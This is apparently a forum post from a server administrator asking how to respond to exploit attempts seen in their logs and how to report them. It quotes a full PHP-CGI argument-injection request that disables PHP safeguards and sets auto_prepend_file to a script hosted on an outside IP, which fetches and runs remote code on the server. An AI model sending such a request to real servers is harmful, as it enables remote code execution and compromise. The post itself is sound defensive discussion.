I'm getting a number of exploit attempts from different IP's today.
GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt
The content of info3.txt is:
Google is showing a bunch of people talking about this for the past couple of days but no real solutions or explanations of what this is. There is a write up at: http://huguesjohnson.com/programming/hacking-attempt/
"I think this is where I'll leave things for now. I don't know if this site is part of a crime ring but since it has access to a botnet I'm going to assume it is. The 81.17.24.82 IP isn't showing up anywhere as a distributor of malware which is odd. Maybe this is a web server that was recently compromised or an IP address recently acquired by whoever is organizing this attack."
My question is: What is the next step in situations like this? Is there a best practice that administrators should follow to notify security folks? Which sites do you follow to keep on top of things like this and apply the proper safeguards (like mod_security)?